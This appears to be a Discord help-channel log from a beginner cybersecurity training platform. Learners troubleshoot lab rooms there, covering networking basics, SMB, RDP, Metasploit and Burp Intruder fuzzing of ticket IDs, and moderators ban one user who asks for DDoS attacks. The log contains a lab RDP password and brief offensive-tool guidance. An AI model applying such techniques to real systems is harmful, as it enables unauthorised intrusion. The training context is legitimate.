Well if you come across a lot of things you never heard before and just read them 1 time in a room, it might be hard to keep everything. I personally started taking notes, the reason is that when I write down the most important parts of a room I remember them easier if I wrote them myself at least once. Also that you have something to look up afterwards on your own notes is a good thing. But overall, learning is always about repetition, so the more often you come across such terms, the easier you remember them.

turbid grove
#

Agreed. The simple act of typing the info in your notes will help you remember more. Grab a note application. Could be a text doc or something like cherrytree or blankslate (web based)
Jot down notes and refer to it later if necessary.

rocky wave
#

@brittle birch if you still didn't find answer, watch YouTube video in this task. There is an answer. It's really tricky

open wraith
#

Hi guys , I was learning Pre-Security. As soon as I completed Into to LAN and reached THE OSI Model , THM asked me to subscribe !😟 . Do any of you guys have TryHackMe Vouchers . If yes Please help me bcoz I really can't pay the amount since I am a school student

median mica
#

You dont have full access to pathways if you arent subscribed. However that dosent mean you cant use the site. There are plenty of other free rooms you can do

crimson flame
#

@median mica if we skip the paid rooms, does it severely affect the learning in future?

mellow elbow
#

good morning/evening/night guys

#

i am stuck here and dont know how to use the game

#

just moving around

turbid grove
somber currentBOT
#

Gave +1 Rep to @turbid grove

willow oyster
#

Hello

#

Does the ARP protocol works across the network?

warm epoch
barren linden
#

So it works only between devices in the same ip subnet

#

On different subnets (splitted by routers) routing tables are used

#

Fun Fact: the NDP Protocol (ARP for ipv6) is also vulnerable to Spoofing, because to pretend that, some signature would be needed in the protocol, which was discussed while working on ipv6 (but the advantage is not high enough to implement such time consuming things into a protocol)

#

And for preventing ARP/NDP Spoffing there are some solutions: client based (always bad) or on switches

marsh veldt
#

can my wifi provider see my history ?

civic hare
#

Yeap..sure

timber star
#

Any way around that? Are VPNs enough?

soft snow
bitter dome
#

VPNs are enough but then you're letting the VPN provider see your searches

wind lichen
#

anybody pls explain to me the 3 way handshake part on the packets and frames section

marsh veldt
#

so I think using a vpn and a public server like cloudflare would solve that

marsh veldt
wind lichen
#

the part before the tcp closing connection

#

the table showing the initial sequence no etc

marsh veldt
warm epoch
#

@marsh veldt let's keep it appropriate for an educational environment

waxen ruin
rapid marlin
#

Hey guys! Im currently in Linux Fundamentals Part 1 and I am noticing that the box AttackBox that we launch for the room doesn't correlate to the questions we are asked. Has anyone else ran into this issue?

sage sandal
rapid marlin
#

I will try and send screenshot

#

I am doing Linux Fundamentals Part 1

#

Task 5 Interacting with File System

sage sandal
#

you ll have to verify to send pics

#

!docs verify

rain berryBOT
rapid marlin
#

Gotcha! I am now verified

#

So I answered the questions based off the youtube answers.. the box that it lets me deploy in the website is different than the box in the video

#

I just hope this isnt a re-occuring issue with later lessons

sage sandal
#

Maybe try to terminate it and re open it

rapid marlin
#

hmmm.. okay! I see what you mean

#

In task 3 it gives me a machine to launch, but its not the machine used for the room, but "my machine" which I would rather have the machine for the room for now

#

victory!! it worked!

sage sandal
#

Yay 😄

rose kernel
#

Hi

foggy edge
#

Hi

void grove
#

hello guys, may someone kindly please help me in the subdomainenumeration task 6, i have failed to answer the question close to one and a half weeks

warm epoch
#

@void grove Please do not spam the same question over several channels

void grove
#

sorry man

plush snow
#

How necessary is it to write down extensive notes during this pathway?

inland token
plush snow
#

im making condense notes of the most important stuff

#

I noted down all the important bits of the stages of the network tree

limpid oyster
sage sandal
#

do python3 -m http.server <random port number>

limpid oyster
#

thank you!

sinful parrot
#

Hi everybody, after 3 weeks of not improving i am still stuck at SMB task 4. I need to find out which document contain valuable information about the profile..... how ca i open the files?

sinful parrot
soft snow
remote hemlock
#

If you type ‘help’ while connected via smbclient it will give you info about what you can do

sinful parrot
#

i tried to scopy and get the file buuutt....the space was the problem i think

#

what does the D, DH, and H mean?

soft snow
sinful parrot
sinful parrot
#

o.m.g... I did it! it was pain... not gonna lie xD THX @soft snow & @remote hemlock

somber currentBOT
#

Gave +1 Rep to @soft snow

full terrace
#

layer 8 exist ?

sage sandal
marsh veldt
#

Hello

#

Im a new candidate

patent citrus
#

hello everyone I'm new here nice to meet you 🙂

full terrace
#

idk how to solve this,any hints ?

#

nevermind i solved this

marsh veldt
full terrace
#

you need to drop packets from first pc

marsh veldt
#

100.34 or 113.99

full terrace
#

100.34

marsh veldt
#

Hmm Thanks

full terrace
#

and in the label "Destination IP" put 110.1

#

i hope you understood

marsh veldt
#

✌🏻

full terrace
#

my english is not very good 🙂

marsh veldt
#

But my understanding is good
No Problem ✌🏻

wind iris
#

hi. someone knows why in root linux fundamentals part 1, in the machine deployed the user es root and not tryhackme?

soft snow
marsh veldt
#

Hey

#

What path should I take first

warm epoch
marsh veldt
marsh veldt
warm epoch
#

That says Pre Security, which is what I said.

marsh veldt
warm epoch
#

I mean, it matches exactly what I said.

#

You may also have trouble doing it from mobile.

marsh veldt
marsh veldt
broken pivot
#

Hi everyone

#

All are beginner here?

#

Like me

full terrace
#

yep

oak folio
#

I'm a beginner too

hearty cipher
#

I'm a beginner too

marsh veldt
#

Hello

#

World

full terrace
#

after pre sec path what path do you recommend to choose ?

velvet oar
heavy parcel
#

Awesome sounds good, getting started with the pre-security path, has been informational and smooth. I may choose complete beginner also...........the other recommended choice is Linux I believe. Tomorrow is the start of the Christmas room suitable for beginners that starts tomorrow..... Advent of Cyber.

marsh veldt
#

I’m stuck on this question “what is the syntax to ping 10.10.10.10?”.

torn lantern
marsh veldt
soft snow
marsh veldt
#

depends on what you use

#

for say you use cmd

#

it would just be ping followed by 10.10.10.10

#

ex; ping 10.10.10.10

lilac fox
#

I'm stuck on windows fundamentals part 1: task 7, it won't let me edit the permissions for SYSTEM, anyone know why?

digital aurora
#

Hi I want a free website attacks ddos

ionic smelt
#

:pepebruh:

soft snow
fathom vault
#

-ban @digital aurora Asking for Ddos websites or services are unethical and not what we do here. Appeals are bans@tryhackme.com

somber currentBOT
#

🔨 Banned ! 𝑺𝐩𝐞𝐞𝐝𝟕#9994 indefinitely

marsh veldt
marsh veldt
#

Hello, what am i doing wrong please? Im supposed to download a text file from a remote machine, but nothing happens after the wget command

#

Hold on

#

Could you add the following detail? Where are you running these commands?

#

on the "attacker" host or on the "victim" host?

#

this is a task in Linux Fundamentals Part 3

#

im on the victim host i think

#

logged in to "mine", then SSH to the remote machine

#

as per instructions/screenshots

#

started the attack box, SSH to a remote machine
following the instructions
starting web server with python3 -m http.server command
then wget, but nothing happens

#

I see...BUT....

#

starting web server with python3 -m http.server command

This part. Where are you doing it?

#

on the remote machine

#

the one i SSH into

#

The idea of starting the http server is when you want to transfer a file FROM the attacker into the victim

#

or well, vice verse

marsh veldt
#

(so you should have 2 open terminals...or 1 if you closed the SSH connection after running the http command on the victim's host)

#

I see

#

(if you don't think I'm making sense or don't understand something I'm saying please say it! We are here to give a hand 🤝 )

#

Thanks very much, yes it's working now. Starting the http server on a victim box, then downloading with wget from the attacker box

#

Thank you again 🙂

#

You got it? I'm glad it worked!

#

You're welcome. Please pass by again if something else comes up or you have any doubt.

#

Will do, much appreciated

marsh veldt
#

Me again, im stuck with an answer for question:
When will the crontab on the deployed instance (10.10.57.138) run?

@reboot /var/opt/processes.sh

#

the job stars after each reboot / everytime linux starts, is that correct?

#

the answer should be one word of 7 characters 🙂

#

restart - wrong answer

#

could someone guide me to the correct answer please?

limber oasis
marsh veldt
#

that's the problem, when i write reboot as the answer, it says it's incorrect

#

restart also incorrect

#

the correct answer should have 7 characters, as there are 7 * in the field

limber oasis
#

You have a symbol to add, don't you? 🙂

marsh veldt
#

ok, the process will run at reboot OR @amber oar :))

#

many thanks 🙂

somber currentBOT
#

Gave +1 Rep to @livid bloom

vocal prism
#

.

marsh veldt
#

🕊️

plush snow
#

in the activity "Extending Your Network" in the attack box. how do you figure out that 80 is the port that stops the attack?

#

i understand the ip stuff but not really the port? as in what determines why a particular port is the correct choice

#

figured it out by reading back. but does every router use port 80 to connect to the internet?

marsh veldt
plush snow
#

im not sure haha? i think router right?

#

going by the picture in the activity it shows a network on port 80 connecting onto a router on port 80 which then connects to the internet

#

is port 80 a special thing or just used in this example

marsh veldt
#

oh that's just an example

plush snow
#

ah i see

marsh veldt
#

Yeap it is actually!

#

There's a list of "well-known" ports that are usually used for specific services

#

You would expect a web server if you see only port 80 or 443 open, to name an example

#

in real life, your router connects to the internet and opens a connection through any port (This is related to Port Address Translation)

plush snow
#

ah ok so on a server being attacked (like in the attack box) blocking accesses port 80 would be the way to go

marsh veldt
#

mind you would drop all connections both benign and malicious!

#

but it's an option in case you need it

plush snow
#

but it would stop an attack from a hostile PC

marsh veldt
#

yes indeed (Assuming no other port is open)

plush snow
#

I see i see!

marsh veldt
#

you could blacklist IPs too (But blacklisting manually is not recommended as it doesn't scale well...if you can automate it somehow then yes)

plush snow
#

yea i would assume that would be a basic scenario

#

thanks for you help!

marsh veldt
winter jolt
#

Is it just me or does the task 6 site in Extending your network not work?

#

Opening it on a new tab and refreshing the same tab don't work either

#

To clarify the error is that no packet is sent on the simulation itself

marsh veldt
#

Hi I am new here could I ask a question please re. AD Hacking

#

Sorry I think I've selected the wrong path ! I will ask again in complete-beginner path

marsh veldt
marsh veldt
#

Can i ask for tips on this channel about Web Security?

warm epoch
opal hemlock
#

Yo guys, just started the pre-security path today. Looking forward to learning much more

marsh veldt
#

hey, that's nice! good luck and have fun~ 🙂

opal hemlock
crimson flame
wide crater
#

whats up everyone just started the pre sec path on THM would love to have some friends to keep me accountable on my learning path! looking to hack around 4-5 days a week

#

if you wanna friend me on THM my username is stevethemenace 🙂

lusty knoll
#

doubt

#

for those who just started out dont talk about your future focus on learning you cant predict what happens next

spare swift
#

hi, i have a problem with linux fundamental part 1, with the question "what is the username of who you're logged in as on your deployed linux machine ?" i typed "whoami", it said i'm logged with root, but tryhackme said i have a wrong answer.

warm epoch
spare swift
#

Ho, it said i have choice, VPN or AttackBox

#

Ok, gonna try with vpn, thx 🙂

warm epoch
#

@spare swift No

#

There are two machines involved

#

The target and the attacker.

#

Attackbox or VPN is your choice for the attacker.

#

You need to use the target machine in the room. The "Start Machine" button.

#

If you've already deployed that as well as the attackbox, there are tabs along the bottom right to swap between them.

spare swift
#

Haaa ok thanks for the information, i'll try again later

real spire
#

i cant get the attack box to open? am i missing something?

turbid grove
#

start machine and start attack box are different things. I think that's a common mistake.
I recommend using your own vm as it's much faster than the web based attack box in my experience.

tender scarab
#

your own vm
Why do you even need a VM? You can ran everything from you local machine.

soft snow
warm epoch
tough pollen
#

Hello, guys. I have a problem in Linux Fundamentals Part 3, Task 8. I need to access the Apache logs but the user provided (tryhackme) does not have access. Do you know if there is any way to access the logs?

warm epoch
#

Try ls with long list.

tough pollen
somber currentBOT
#

Gave +1 Rep to @warm epoch

tough pollen
somber currentBOT
#

Gave +1 Rep to @warm epoch

remote roost
#

Hi, I'm having issues with the nmap section, anyone care to assist me?

#

In task 14 (Practical), I'm unable to find out what the target machine ip is. 1st question: Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?

warm epoch
#

That means you haven't deployed the target

#

Go back to the task with the "Start Machine" button and click it.

remote roost
#

Hmmm, yesterday I did that but it did not resolve my problem, currently trying again

warm epoch
#

I mean that's the problem here

#

Or you're blocking JS which will break pretty much the whole site

remote roost
#

I'm using plain safari, which shouldn't block JS.

#

I've started the machine and it's still not showing target ip

#

Just confirmed JS is enabled

warm epoch
remote roost
#

Can I post a screenshot?

warm epoch
#

!docs verify

rain berryBOT
warm epoch
#

You need to verify in order to post images in this server

remote roost
#

Done

warm epoch
#

Scroll up

#

Top of the page above the tasks

remote roost
warm epoch
#

You haven't deployed the target

#

Go to task 1

remote roost
#

Oh damn, my bad

warm epoch
#

Click "Start Machine", the green button at the top right of the task

remote roost
#

Got it! Thanks

#

I thought it would deploy with the attackbox

warm epoch
#

The attack box is a convenience

#

It's an alternative to using your own Kali machine etc and VPNing in

remote roost
#

Thanks. How do I download the .ovpn to use vpn?

warm epoch
#

!vpn

rain berryBOT
remote roost
#

Thanks

zenith elbow
#

Hey all, I've a question I can't figure out on this path. It's in the Windows Fundamentals Part 1 room, task 3.
Here's the question :

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Can I have any hint, please ?

#

Nevermind I've found.

solemn oar
#

!docs verify

rain berryBOT
remote roost
#

I'm having issues with the metasploit section, can anyone assist me?

soft snow
remote roost
#

In task 5 I'm having a hard time using the exploit and gaining control over the target as the exploit fails

#

It's in the pentesting tool series

soft snow
remote roost
#

My bad, wrong lhost ip.

zenith elbow
#

I must miss something, 'cause I don't find the answer to the task 8 of win fundamentals 1....
The question :

In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?
Spoiler about what I did : ||I right click on the desktop, then chose "View", then "Small icons". The last setting is "show desktop icons", and it says me that it is a wrong answer. Then I've searched both settings and control panel, and I don't find anything that allows me to resize icons....||

soft snow
zenith elbow
somber currentBOT
#

Gave +1 Rep to @soft snow

harsh reef
#

Hi guys I am having difficulties learning using my phone

steel steppe
#

If you are talking about visual issues with the deployable machines (test examples/minigames) then you can try making the deployable machine fullscreen which will open a page dedicated to the minigame where you wull be abel to see better, alternatively you can turn your browser to desktop mode, almost all browsers have this feature and you can search up how on your browser. Once its on desktop mode you can zoom in to see text better

#

@harsh reef /\

harsh reef
rough delta
icy dirge
potent wedge
#

congratz.... now you have inspired shadow to do osint on this name

marsh veldt
#

Need some help within Windows Fundamentals 1. When I use "xfreerdp /u:administrator /p:letmein123! /v:10.10.20.248" I get the following error:
[12:47:59:923] [11856:11857] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[12:47:59:938] [11856:11857] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[12:47:59:938] [11856:11857] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[12:48:14:953] [11856:11857] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[12:48:14:953] [11856:11857] [ERROR][com.freerdp.core] - failed to connect to 10.10.20.248

potent wedge
marsh veldt
somber currentBOT
#

Gave +1 Rep to @potent wedge

potent wedge
#

no problem... good for you to realise and know how to handle the problem

fresh grove
fresh grove
warm epoch
#

It's quite verbose

soft snow
fresh grove
tired thicket
#

No. Xfreerdp couldn't connect because it couldn't reach the server

#

Due to no von connection

fresh grove
tired thicket
#

Attackbox doesn't need a vpn connection to connect to targets. So you would never reproduce it. If you get same error it's because target is down

#

*vpn

fresh grove
tired thicket
#

You can connect to THM targets from your own machine. Without browser based attack box.

For that you need to connect to thm vpn.

somber currentBOT
#

Gave +1 Rep to @tired thicket

tired thicket
#

So what happened, they tried to connect to target from their own machine/vm without a vpn connection up

#

(at least that's how i understood it)

marsh veldt
#

Just finished this it was a blast! Off to complete beginner! Wish you all best of luck if anyone has questions @ me while it's fresh in my head

winter tartan
#

how the web works - how websites work, challenge 3, the hint gives different code than the question? am i missing something? it doesn't work correctly with the code the hint uses

shadow parcel
#

?

#

which hint and which question?

winter tartan
#

It was task 3 question 2, "Add the button HTML from this task that changes the element's text..."

#

i have a screen shot if that helps

winter tartan
shadow parcel
#

ahh the 'optional' one

#

yeah i just copied the code and change dhack the planet to button clicked

#

you dont get a special flag or anything

winter tartan
#

yeah, i got it to work but realised the hint didn't get me a result

#

i put the code in wrong at first but didn't realise (tried to put it between the <script> tags) so clicked hint, then copy and pasted that, and it didn't do anything for me (after putting it in the correct place)

#

then i realised that the code in the block of text and the code in the hint are different

shadow parcel
#

oh, i didnt copy from the hint, i copied from the code just above the questions area

#

HTML elements can also have events...

#

i didnt even read the hint, but yeah that should say Button Clicked and not Hack the Planet

#

otherwise its the exact same code as far as i can tell

winter tartan
#

for whatever reason, it doesn't seem to actually change anything compared to the correct code

#

i guess it's probably not an actual editor but just does the required change when you put the right text in? idk, but yeah it stumped me for a minute or two before i thought to check it against the code in the body of the text

shadow parcel
#

only difference is what "demo" tag displays. EIther Hack the Planet or Button clicked

#

and it only does that after you click

#

onclick=

winter tartan
#

huh, i must've still been making an error then because when i used the "hack the planet" code it didn't do anything on click, but when i used the other one it did

shadow parcel
#

they might have something on the backend to check for the 'button clicked' string

#

like if you do the 1st question and put Planet the Hack you wont get a flag

lyric sail
#

hey guys, i need a little help in the "Network Services" room. I have to enumerate a machine with Telnet. So I nmap but all ports are closed. Killed the machine but same result :(

quasi maple
#

Hello. I'm stuck into the Linux Fundamentals part 3, task 4. When i try to connect to ssh the password is always wrong

soft snow
soft snow
quasi maple
soft snow
quasi maple
soft snow
#

The target machine IP can be found in a box like that:

quasi maple
somber currentBOT
#

Gave +1 Rep to @soft snow

lyric sail
raven knot
#

Onto complete beginner

lament fjord
#

Hi.

dusky crag
#

Hey guys, I've just begun the pre-security pathway and was wondering how essential it is to remember all this stuff? Namely LAN topologies, or small things like the ping command using ICMP, because I feel like I'm bound to forget them.

#

considering I forgot about the topologies already once, learnt them last year in college, never came in active use and ended up forgetting it

lunar pilot
#

But I do agree with you, it becomes very easy to forget though

dusky crag
#

Does stuff like what I mentioned actually useful in cyber security? Or is it something that's like at the back of your head and only comes in use in very niche circumstances

#

I'll try out taking notes though, thanks

lunar pilot
#

LAN topologies are handy outside of info sec, namely where you may need to design a computer network for an organisation, understanding protocols is a little more important though as you would need to understand how they work and where they are mapped to when pen testing

dusky crag
#

I see, thank you

lunar pilot
#

All good! 🙂

#

then again you can get decent cheat sheets on google

grand halo
#

I've completed this pathway just now

#

Good stuff and I'm glad I went through this one as it's probably the more basic ones

vivid yoke
#

Hi guys finished 2 rooms (introductory things) on THM, gonna finish the research part tonight after home

#

What path should i take after that? 😄

#

I have a dream to able finish OSCP somedays in my future

knotty sail
#

nice pic btw 👍

vivid yoke
#

ROFL

vivid yoke
somber currentBOT
#

Gave +1 Rep to @knotty sail

vivid yoke
scarlet glen
#

Hey guys, I'm about to finish Pre-Security. Anyone has idea what is the better path after concluding this module?

#

Offensive pentest oriented

#

I'm between Jr. pentester and Cyberdefense or complete beginner, tbh, I have no idea

#

Well, I'm still using free account, so I have lots of limitation IG. When I sign premium maybe I'll make my mind somehow

potent wedge
#

complete beginner is the one shadow would recommend

scarlet glen
#

thanks shadow

knotty sail
#

yeah you can either go to web fundamentals or complete beginner

#

don't worry about comptia, when you finish all other red paths it gets completed auto

#

cause topics are overlapping

scarlet glen
#

oh, nice then, thanks Kaya

knotty sail
#

np

vivid yoke
#

yo guys finally i finish the first part of beginner! gonna install vm tonight and do the linux fundamental 1 2 and probably 3 also tonight!

#

I thought the 3rd lessons on the very beginner lesson (research on google things) was very boring, but turned out it was very wonderful lesson!

zealous fossil
#

hey guys, anyone had trouble viewing the access.log file in linux fundamental 3 task 8? error is "Username is not in the sudoers file. This incident will be reported" whenever I try to view apache2 access.log file

#

is it something part of the challenge or something is broken?

#

thanks in advance!

marsh veldt
#

who are you logged in as?

marsh veldt
#

I too am stuck 🙂 with the Burp Suite Ticket Task 11, configuring position and payload

#

in Payloads, i choose Payload Type as Numbers, set the range 1 to 100

#

but dont know how to configure the position

zealous fossil
soft snow
#

!docs verify

rain berryBOT
zealous fossil
#

sorry for dumb questions, just started tryhackme 🙃

marsh veldt
#

this is not correct and i dont know what should be 🙂

zealous fossil
marsh veldt
#

try
sudo su

#

and then the command again

zealous fossil
#

think i tried that, lemme do it again

soft snow
#

Therefore you need to be logged in to the account and capture a request to any ticket

marsh veldt
#

redcidedeep: how about
su root
and then running the command?

soft snow
zealous fossil
zealous fossil
marsh veldt
#

Fontaene: i did that, but now i have to configure the Positions and i dont know what to write in there. In that screenshot above, i added the $ (after i amended the url to ..support/tickets/

zealous fossil
somber currentBOT
#

Gave +1 Rep to @soft snow

soft snow
marsh veldt
soft snow
# marsh veldt

But that screen is the payload tab and not the positions ?

marsh veldt
#

here, it's doing something 🙂

soft snow
# marsh veldt here, it's doing something 🙂

Again, that's not the correct url you have captured, neither you are logged in. Start over again while being logged in and capture a request to one of the tickets available in the account you are logged in with.

zealous fossil
#

thanks very much!

#

@marsh veldt thanks too 🙃

somber currentBOT
#

Gave +1 Rep to @past onyx

soft snow
marsh veldt
#

proxy on

#

sent to intruder and clicked on Start Attack

#

however i didn't define the position as i dont know how

#

any hint please?

soft snow
# marsh veldt sent to intruder and clicked on Start Attack

Okay, so that request looks good now 🙂 So as you want to fuzz the ticket numbers to see which of them exist, you have to set the position in line 1. So first clear all the wrong positions with the button on the right hand side, then highlight the ticket number (in your case 6) and press add.

#

Also, do not manually add any lines to that request, like you did in your 2nd image

marsh veldt
#

Got it, thanks very much, it works now 🙂

dusky crag
#

Uhh, how necessary are the paid rooms in the pre-security path, and is there a student discount

soft snow
#

!docs student

rain berryBOT
dusky crag
somber currentBOT
#

Gave +1 Rep to @soft snow

vapid peak